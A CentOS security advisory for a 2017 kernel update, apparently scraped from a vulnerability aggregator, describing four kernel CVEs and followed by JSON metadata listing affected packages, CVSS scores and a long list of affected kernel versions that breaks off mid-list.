Search...

kernel, perf, python security update

2017-04-13T11:00:48

ID CESA-2017:0933
Type centos
Reporter CentOS Project
Modified 2017-04-13T11:00:48

Description

CentOS Errata and Security Advisory CESA-2017:0933

The kernel packages contain the Linux kernel, the core of any Linux operating system.

These updated kernel packages include several security issues and numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2986951.

Security Fix(es):

A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)

A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate)

A flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption. (CVE-2016-9793, Moderate)

A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory. (CVE-2017-2618, Moderate)

Red Hat would like to thank Alexander Popov for reporting CVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was discovered by Paul Moore (Red Hat Engineering).

Merged security bulletin from advisories: http://lists.centos.org/pipermail/centos-announce/2017-April/022385.html

Affected packages: kernel kernel-abi-whitelists kernel-debug kernel-debug-devel kernel-devel kernel-doc kernel-headers kernel-tools kernel-tools-libs kernel-tools-libs-devel perf python-perf

Upstream details at: https://rhn.redhat.com/errata/RHSA-2017-0933.html

JSON Vulners Source

Initial Source

{"href": "http://lists.centos.org/pipermail/centos-announce/2017-April/022385.html", "history": [], "id": "CESA-2017:0933", "reporter": "CentOS Project", "published": "2017-04-13T11:00:48", "description": "**CentOS Errata and Security Advisory** CESA-2017:0933\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThese updated kernel packages include several security issues and numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. To see the complete list of bug fixes, users are directed to the related Knowledge Article: https://access.redhat.com/articles/2986951.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt for the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with non-namespace CAP_NET_ADMIN are able to trigger this call and create a situation in which the sockets sendbuff data size could be negative. This could adversely affect memory allocations and create situations where the system could crash or cause memory corruption. (CVE-2016-9793, Moderate)\n\n* A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory. (CVE-2017-2618, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636 and Ralf Spenneberg for reporting CVE-2016-8650. The CVE-2017-2618 issue was discovered by Paul Moore (Red Hat Engineering).\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-April/022385.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0933.html", "title": "kernel, perf, python security update", "affectedPackage": [{"arch": "x86_64", "packageName": "kernel-tools-libs", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-tools-libs-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "kernel", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "kernel-tools", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-tools-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "noarch", "packageName": "kernel-doc", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-doc-3.10.0-514.16.1.el7.noarch.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "noarch", "packageName": "kernel-abi-whitelists", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-abi-whitelists-3.10.0-514.16.1.el7.noarch.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "perf", "operator": "lt", "OS": "CentOS", "packageFilename": "perf-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "kernel-tools-libs-devel", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-tools-libs-devel-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "python-perf", "operator": "lt", "OS": "CentOS", "packageFilename": "python-perf-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "kernel-debug-devel", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-debug-devel-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "kernel-devel", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-devel-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "any", "packageName": "kernel", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-3.10.0-514.16.1.el7.src.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "kernel-headers", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-headers-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}, {"arch": "x86_64", "packageName": "kernel-debug", "operator": "lt", "OS": "CentOS", "packageFilename": "kernel-debug-3.10.0-514.16.1.el7.x86_64.rpm", "packageVersion": "3.10.0-514.16.1.el7", "OSVersion": "7"}], "bulletinFamily": "unix", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "hash": "15dd023e99a2b35fa75c3eb62617d3556c7759f64cf6f5f1103390c6a52d017f", "references": ["https://rhn.redhat.com/errata/RHSA-2017-0933.html"], "edition": 1, "cvelist": ["CVE-2016-8650", "CVE-2016-9793", "CVE-2017-2636", "CVE-2017-2618"], "lastseen": "2017-10-03T18:26:54", "viewCount": 10, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "vulnersScore": 7.2}, "hashmap": [{"key": "affectedPackage", "hash": "6224b7318599b3f259c6a02d6daf281d"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "72dd87f20f8c4a5d6a04410a0a18bab2"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "5d4cf530031b0190b7aefa6552dcf88f"}, {"key": "href", "hash": "bdcd3e6b7ecc9c5f1838aabbcf2ee70d"}, {"key": "modified", "hash": "8487a0bb4d6a26104392e17b9b50908e"}, {"key": "published", "hash": "8487a0bb4d6a26104392e17b9b50908e"}, {"key": "references", "hash": "4d83d1afbee9201be1000d79e757a621"}, {"key": "reporter", "hash": "9855627921475e40e00f92d60af14cb3"}, {"key": "title", "hash": "da20c65ef2fb426cec85e639b01a0140"}, {"key": "type", "hash": "cdc872db616ac66adb3166c75e9ad183"}], "objectVersion": "1.3", "modified": "2017-04-13T11:00:48"}

{"cve": [{"lastseen": "2018-01-05T11:52:30", "references": ["http://www.openwall.com/lists/oss-security/2016/12/03/1", "https://access.redhat.com/errata/RHSA-2017:0931", "http://www.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.14", "https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793", "https://access.redhat.com/errata/RHSA-2017:0933", "https://github.com/torvalds/linux/commit/b98b0bc8c431e3ceb4b26b0dfc8db509518fb290", "http://www.securitytracker.com/id/1037968", "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b98b0bc8c431e3ceb4b26b0dfc8db509518fb290", "https://source.android.com/security/bulletin/2017-03-01.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1402013", "https://access.redhat.com/errata/RHSA-2017:0932", "http://www.securityfocus.com/bid/94655"], "edition": 5, "description": "The sock_setsockopt function in net/core/sock.c in the Linux kernel before 4.8.14 mishandles negative values of sk_sndbuf and sk_rcvbuf, which allows local users to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact by leveraging the CAP_NET_ADMIN capability for a crafted setsockopt system call with the (1) SO_SNDBUFFORCE or (2) SO_RCVBUFFORCE option.", "reporter": "NVD", "published": "2016-12-28T02:59:00", "title": "CVE-2016-9793", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2016-9793"], "scanner": [], "cpe": ["cpe:/o:linux:linux_kernel:4.8.13"], "modified": "2018-01-04T21:31:23", "id": "CVE-2016-9793", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9793", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-20T11:06:34", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1395187", "https://access.redhat.com/errata/RHSA-2017:0931", "http://www.securityfocus.com/bid/94532", "http://seclists.org/fulldisclosure/2016/Nov/76", "https://github.com/torvalds/linux/commit/f5527fffff3f002b0a6b376163613b82f69de073", "https://access.redhat.com/errata/RHSA-2018:1854", "https://access.redhat.com/errata/RHSA-2017:0933", "http://www.securitytracker.com/id/1037968", "https://source.android.com/security/bulletin/2017-03-01.html", "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f5527fffff3f002b0a6b376163613b82f69de073", "https://access.redhat.com/errata/RHSA-2017:0932", "http://www.openwall.com/lists/oss-security/2016/11/24/8"], "description": "The mpi_powm function in lib/mpi/mpi-pow.c in the Linux kernel through 4.8.11 does not ensure that memory is allocated for limb data, which allows local users to cause a denial of service (stack memory corruption and panic) via an add_key system call for an RSA key with a zero exponent.", "edition": 5, "reporter": "NVD", "published": "2016-11-27T22:59:09", "title": "CVE-2016-8650", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2016-8650"], "scanner": [], "modified": "2018-06-19T21:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.11"], "id": "CVE-2016-8650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8650", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-20T11:58:43", "references": ["http://www.securityfocus.com/bid/96272", "https://marc.info/?l=selinux&m=148588165923772&w=2", "https://access.redhat.com/errata/RHSA-2017:0931", "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2618", "https://access.redhat.com/errata/RHSA-2017:0933", "https://www.debian.org/security/2017/dsa-3791", "https://access.redhat.com/errata/RHSA-2017:0932", "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=0c461cb727d146c9ef2d3e86214f498b78b7d125"], "description": "A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files before 4.9.10. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory.", "edition": 5, "reporter": "NVD", "published": "2018-07-27T15:29:00", "title": "CVE-2017-2618", "type": "cve", "enchantments": {"score": {"modified": "2018-11-20T11:58:43", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-2618"], "scanner": [], "modified": "2018-09-20T14:54:33", "cpe": ["cpe:/o:linux:linux_kernel:3.18.24", "cpe:/o:linux:linux_kernel:2.6.1:rc3", "cpe:/o:linux:linux_kernel:4.2", "cpe:/o:linux:linux_kernel:3.2.71", "cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.12.26", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:2.0.29", "cpe:/o:linux:linux_kernel:3.12.8", "cpe:/o:linux:linux_kernel:2.1.97", "cpe:/o:linux:linux_kernel:4.8.5", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:4.2:rc4", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:2.2.20", "cpe:/o:linux:linux_kernel:2.6.22:rc7", "cpe:/o:linux:linux_kernel:2.6.37:rc8", "cpe:/o:linux:linux_kernel:2.4.29:rc1", "cpe:/o:linux:linux_kernel:2.1.6", "cpe:/o:linux:linux_kernel:2.6.12:rc6", "cpe:/o:linux:linux_kernel:4.4.111", "cpe:/o:linux:linux_kernel:4.7:rc7", "cpe:/o:linux:linux_kernel:2.6.6:rc1", "cpe:/o:linux:linux_kernel:2.0.12", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.15:rc4", "cpe:/o:linux:linux_kernel:3.10.66", "cpe:/o:linux:linux_kernel:2.1.90", "cpe:/o:linux:linux_kernel:3.12.52", "cpe:/o:linux:linux_kernel:2.6.20.9", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:2.3.7", "cpe:/o:linux:linux_kernel:4.0", "cpe:/o:linux:linux_kernel:2.1.42", "cpe:/o:linux:linux_kernel:2.4.0:test3", "cpe:/o:linux:linux_kernel:2.1.113", "cpe:/o:linux:linux_kernel:2.5.36", "cpe:/o:linux:linux_kernel:2.1.115", "cpe:/o:linux:linux_kernel:2.6.2:rc2", "cpe:/o:linux:linux_kernel:2.2.7", "cpe:/o:linux:linux_kernel:3.0.72", "cpe:/o:linux:linux_kernel:3.14.43", "cpe:/o:linux:linux_kernel:2.6.32.45", "cpe:/o:linux:linux_kernel:2.6.13:rc1", "cpe:/o:linux:linux_kernel:2.6.18.1", "cpe:/o:linux:linux_kernel:2.4.27", "cpe:/o:linux:linux_kernel:2.6.27.51", "cpe:/o:linux:linux_kernel:2.1.65", "cpe:/o:linux:linux_kernel:2.6.22.3", "cpe:/o:linux:linux_kernel:2.6.30.4", "cpe:/o:linux:linux_kernel:3.19.7", "cpe:/o:linux:linux_kernel:3.9:rc4", "cpe:/o:linux:linux_kernel:2.6.16.49", "cpe:/o:linux:linux_kernel:2.6.19.1", "cpe:/o:linux:linux_kernel:2.6.28.6", "cpe:/o:linux:linux_kernel:4.0.4", "cpe:/o:linux:linux_kernel:2.6.31.2", "cpe:/o:linux:linux_kernel:3.0.74", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:4.9.3", "cpe:/o:linux:linux_kernel:2.6.22.19", "cpe:/o:linux:linux_kernel:2.6.32.17", "cpe:/o:linux:linux_kernel:2.6.37.2", "cpe:/o:linux:linux_kernel:2.6.16.4", "cpe:/o:linux:linux_kernel:3.10.92", "cpe:/o:linux:linux_kernel:2.2.21:pre4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:2.2.23:rc2", "cpe:/o:linux:linux_kernel:2.4.18:pre4", "cpe:/o:linux:linux_kernel:3.4:rc1:~~~~x86~", "cpe:/o:linux:linux_kernel:3.18.43", "cpe:/o:linux:linux_kernel:2.6.32.24", "cpe:/o:linux:linux_kernel:2.6.16.15", "cpe:/o:linux:linux_kernel:2.6.32:rc2", "cpe:/o:linux:linux_kernel:4.5.6", "cpe:/o:linux:linux_kernel:4.9:rc7", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:2.6.35.10", "cpe:/o:linux:linux_kernel:4.5.3", "cpe:/o:linux:linux_kernel:2.6.38:rc1", "cpe:/o:linux:linux_kernel:3.2:rc5", "cpe:/o:linux:linux_kernel:2.6.38.8", "cpe:/o:linux:linux_kernel:2.6.15.2", "cpe:/o:linux:linux_kernel:3.4.54", "cpe:/o:linux:linux_kernel:4.1.40", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:2.6.39", "cpe:/o:linux:linux_kernel:2.6.27.30", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.4.57", "cpe:/o:linux:linux_kernel:3.4.89", "cpe:/o:linux:linux_kernel:2.6.22.15", "cpe:/o:linux:linux_kernel:3.14.4", "cpe:/o:linux:linux_kernel:2.6.20:rc1", "cpe:/o:linux:linux_kernel:3.18.54", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.14.29", "cpe:/o:linux:linux_kernel:4.4.33", "cpe:/o:linux:linux_kernel:2.1.73", "cpe:/o:linux:linux_kernel:2.3.99:pre3", "cpe:/o:linux:linux_kernel:2.2.24", "cpe:/o:linux:linux_kernel:3.4:rc7", "cpe:/o:linux:linux_kernel:2.3.20", "cpe:/o:linux:linux_kernel:4.4.56", "cpe:/o:linux:linux_kernel:3.4.69", "cpe:/o:linux:linux_kernel:2.6.23.17", "cpe:/o:linux:linux_kernel:3.14:rc3", "cpe:/o:linux:linux_kernel:2.6.23.12", "cpe:/o:linux:linux_kernel:2.6.23:rc1", "cpe:/o:linux:linux_kernel:2.6.16:rc2", "cpe:/o:linux:linux_kernel:3.10.96", "cpe:/o:linux:linux_kernel:2.6.21:git7", "cpe:/o:linux:linux_kernel:2.6.16.3", "cpe:/o:linux:linux_kernel:2.4.9", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:2.6.23.1", "cpe:/o:linux:linux_kernel:2.6.13:rc3", "cpe:/o:linux:linux_kernel:2.6.34.4", "cpe:/o:linux:linux_kernel:3.18.60", "cpe:/o:linux:linux_kernel:2.6.21", "cpe:/o:linux:linux_kernel:2.6.35.5", "cpe:/o:linux:linux_kernel:2.6.14.4", "cpe:/o:linux:linux_kernel:2.6.16.20", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.0.94", "cpe:/o:linux:linux_kernel:2.6.28:rc6", "cpe:/o:linux:linux_kernel:2.5.26", "cpe:/o:linux:linux_kernel:2.3.4", "cpe:/o:linux:linux_kernel:2.6.23.8", "cpe:/o:linux:linux_kernel:4.1.2", "cpe:/o:linux:linux_kernel:2.6.29.2", "cpe:/o:linux:linux_kernel:3.10", "cpe:/o:linux:linux_kernel:3.12.31", "cpe:/o:linux:linux_kernel:3.18.13", "cpe:/o:linux:linux_kernel:2.5.41", "cpe:/o:linux:linux_kernel:4.7:rc3", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:2.3.30", "cpe:/o:linux:linux_kernel:3.10.48", "cpe:/o:linux:linux_kernel:3.0.84", "cpe:/o:linux:linux_kernel:2.2.24:rc5", "cpe:/o:linux:linux_kernel:2.6.32.7", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.4.107", "cpe:/o:linux:linux_kernel:3.4.65", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:2.6.26.2", "cpe:/o:linux:linux_kernel:3.18.32", "cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.4.5::~~~~x86~", "cpe:/o:linux:linux_kernel:2.5.10", "cpe:/o:linux:linux_kernel:2.6.33.16", "cpe:/o:linux:linux_kernel:2.6.27.39", "cpe:/o:linux:linux_kernel:2.6.27.54", "cpe:/o:linux:linux_kernel:2.6.15:rc5", "cpe:/o:linux:linux_kernel:2.0.33", "cpe:/o:linux:linux_kernel:2.2.21:rc2", "cpe:/o:linux:linux_kernel:2.6.9:rc2", "cpe:/o:linux:linux_kernel:2.6.22.16", "cpe:/o:linux:linux_kernel:3.12.39", "cpe:/o:linux:linux_kernel:4.4.30", "cpe:/o:linux:linux_kernel:2.6.35.7", "cpe:/o:linux:linux_kernel:2.1.25", "cpe:/o:linux:linux_kernel:3.19.6", "cpe:/o:linux:linux_kernel:2.6.33.5", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.9.5::~~~~arm64~", "cpe:/o:linux:linux_kernel:3.0.79", "cpe:/o:linux:linux_kernel:3.18.42", "cpe:/o:linux:linux_kernel:3.4.75", "cpe:/o:linux:linux_kernel:2.6.38:rc5", "cpe:/o:linux:linux_kernel:2.6.19:rc4", "cpe:/o:linux:linux_kernel:2.6.31:rc4", "cpe:/o:linux:linux_kernel:3.0.71", "cpe:/o:linux:linux_kernel:3.14.22", "cpe:/o:linux:linux_kernel:2.6.32.55", "cpe:/o:linux:linux_kernel:2.3.45", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:4.4.40", "cpe:/o:linux:linux_kernel:2.1.61", "cpe:/o:linux:linux_kernel:3.18.26", "cpe:/o:linux:linux_kernel:2.6.0:test4", "cpe:/o:linux:linux_kernel:4.4.23", "cpe:/o:linux:linux_kernel:2.6.30.10", "cpe:/o:linux:linux_kernel:2.4.21", "cpe:/o:linux:linux_kernel:2.6.28.9", "cpe:/o:linux:linux_kernel:3.18.19", "cpe:/o:linux:linux_kernel:4.8.15", "cpe:/o:linux:linux_kernel:4.4.102", "cpe:/o:linux:linux_kernel:2.5.64", "cpe:/o:linux:linux_kernel:4.1.10", "cpe:/o:linux:linux_kernel:2.6.16.9", "cpe:/o:linux:linux_kernel:2.3.12", "cpe:/o:linux:linux_kernel:2.6.29.6", "cpe:/o:linux:linux_kernel:2.6.34.2", "cpe:/o:linux:linux_kernel:4.4.51", "cpe:/o:linux:linux_kernel:4.7.7", "cpe:/o:linux:linux_kernel:2.6.16.10", "cpe:/o:linux:linux_kernel:2.6.32.40", "cpe:/o:linux:linux_kernel:2.2.15", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.106", "cpe:/o:linux:linux_kernel:2.1.128", "cpe:/o:linux:linux_kernel:4.4.47", "cpe:/o:linux:linux_kernel:4.4.82", "cpe:/o:linux:linux_kernel:2.5.32", "cpe:/o:linux:linux_kernel:3.2.69", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:2.6.16:rc3", "cpe:/o:linux:linux_kernel:2.4.27:pre1", "cpe:/o:linux:linux_kernel:2.1.95", "cpe:/o:linux:linux_kernel:3.10.98", "cpe:/o:linux:linux_kernel:3.4.90", "cpe:/o:linux:linux_kernel:2.6.25.3", "cpe:/o:linux:linux_kernel:3.14.39", "cpe:/o:linux:linux_kernel:2.6.36:rc2", "cpe:/o:linux:linux_kernel:2.6.32.25", "cpe:/o:linux:linux_kernel:2.6.16:rc7", "cpe:/o:linux:linux_kernel:3.12.59", "cpe:/o:linux:linux_kernel:2.6.32.47", "cpe:/o:linux:linux_kernel:3.18.47", "cpe:/o:linux:linux_kernel:2.1.57", "cpe:/o:linux:linux_kernel:2.3.99:pre4", "cpe:/o:linux:linux_kernel:2.6.20:rc2", "cpe:/o:linux:linux_kernel:2.1.76", "cpe:/o:linux:linux_kernel:2.0.16", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:2.0.37", "cpe:/o:linux:linux_kernel:3.4.39", "cpe:/o:linux:linux_kernel:2.1.20", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.6.33.10", "cpe:/o:linux:linux_kernel:4.4.103", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.4.61", "cpe:/o:linux:linux_kernel:2.6.38", "cpe:/o:linux:linux_kernel:3.2:rc4", "cpe:/o:linux:linux_kernel:4.4.117", "cpe:/o:linux:linux_kernel:2.6.14.1", "cpe:/o:linux:linux_kernel:2.1.33", "cpe:/o:linux:linux_kernel:2.6.32.29", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:2.6.32.2", "cpe:/o:linux:linux_kernel:2.2.5", "cpe:/o:linux:linux_kernel:3.10.21", "cpe:/o:linux:linux_kernel:2.6.10:rc2", "cpe:/o:linux:linux_kernel:3.2.78", "cpe:/o:linux:linux_kernel:4.4.46", "cpe:/o:linux:linux_kernel:3.10.72", "cpe:/o:linux:linux_kernel:2.4.11", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:2.6.31:rc3", "cpe:/o:linux:linux_kernel:3.10.100", "cpe:/o:linux:linux_kernel:2.6.21:rc1", "cpe:/o:linux:linux_kernel:3.10.5::~~~~arm64~", "cpe:/o:linux:linux_kernel:2.0.3", "cpe:/o:linux:linux_kernel:4.4.36", "cpe:/o:linux:linux_kernel:2.1.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.3", "cpe:/o:linux:linux_kernel:4.7.9", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.2.67", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:2.0.17", "cpe:/o:linux:linux_kernel:2.6.14.7", "cpe:/o:linux:linux_kernel:4.4.125", "cpe:/o:linux:linux_kernel:4.1.13", "cpe:/o:linux:linux_kernel:3.3:rc6", "cpe:/o:linux:linux_kernel:3.18.3", "cpe:/o:linux:linux_kernel:2.6.16.50", "cpe:/o:linux:linux_kernel:2.6.4:rc3", "cpe:/o:linux:linux_kernel:2.6.16.40", "cpe:/o:linux:linux_kernel:2.4.5", "cpe:/o:linux:linux_kernel:3.15.8", "cpe:/o:linux:linux_kernel:3.17.5", "cpe:/o:linux:linux_kernel:2.6.16.22", "cpe:/o:linux:linux_kernel:2.6.37:rc1", "cpe:/o:linux:linux_kernel:3.10.71", "cpe:/o:linux:linux_kernel:2.4.33.3", "cpe:/o:linux:linux_kernel:2.0.28", "cpe:/o:linux:linux_kernel:3.10.35", "cpe:/o:linux:linux_kernel:2.6.16.5", "cpe:/o:linux:linux_kernel:3.2.80", "cpe:/o:linux:linux_kernel:3.14.60", "cpe:/o:linux:linux_kernel:2.6.25.14", "cpe:/o:linux:linux_kernel:2.6.27.6", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:2.6.24.1", "cpe:/o:linux:linux_kernel:4.4.41", "cpe:/o:linux:linux_kernel:2.6.32.36", "cpe:/o:linux:linux_kernel:2.6.24:rc8", "cpe:/o:linux:linux_kernel:2.6.23.2", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:4.9:rc4", "cpe:/o:linux:linux_kernel:2.6.16.55", "cpe:/o:linux:linux_kernel:2.6.22:rc1", "cpe:/o:linux:linux_kernel:4.4.32", "cpe:/o:linux:linux_kernel:2.6.24.2", "cpe:/o:linux:linux_kernel:2.6.35.13", "cpe:/o:linux:linux_kernel:4", "cpe:/o:linux:linux_kernel:2.6.26.8", "cpe:/o:linux:linux_kernel:2.1.102", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.31:rc7", "cpe:/o:linux:linux_kernel:3.12.3", "cpe:/o:linux:linux_kernel:2.1.123", "cpe:/o:linux:linux_kernel:2.6.23.11", "cpe:/o:linux:linux_kernel:2.6.28:rc3", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:2.1.35", "cpe:/o:linux:linux_kernel:3.14:rc2", "cpe:/o:linux:linux_kernel:2.3.21", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:4.2.1", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:4.1.20", "cpe:/o:linux:linux_kernel:3.4.99", "cpe:/o:linux:linux_kernel:3.0.88", "cpe:/o:linux:linux_kernel:2.1.45", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:4.4.132", "cpe:/o:linux:linux_kernel:2.5.52", "cpe:/o:linux:linux_kernel:2.6.12:rc5", "cpe:/o:linux:linux_kernel:2.6.32.38", "cpe:/o:linux:linux_kernel:2.6.21.1", "cpe:/o:linux:linux_kernel:2.1.103", 